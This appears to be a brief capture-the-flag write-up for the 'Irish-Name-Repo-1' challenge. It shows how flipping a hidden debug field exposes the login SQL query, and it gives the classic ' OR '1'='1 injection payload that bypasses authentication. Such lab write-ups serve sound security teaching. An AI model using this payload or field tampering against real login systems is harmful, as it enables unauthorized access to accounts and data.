Skip to content

Irish-Name-Repo-1

On inspecting the login page:

<form action="login.php" method="POST">
    <fieldset>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" class="form-control">
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <div class="controls">
                <input type="password" id="password" name="password" class="form-control">
            </div>
        </div>
        <input type="hidden" name="debug" value="0">

        <div class="form-actions">
            <input type="submit" value="Login" class="btn btn-primary">
        </div>
    </fieldset>
</form>

Edit the html and set the debug value to 1

On trying to log in, we get:

username: user
password: pass
SQL query: SELECT * FROM users WHERE name='user' AND password='pass'

SQL injection:

username: ' OR '1'='1
password: ' OR '1'='1
SQL query: SELECT * FROM users WHERE name='' OR '1'='1' AND password='' OR '1'='1'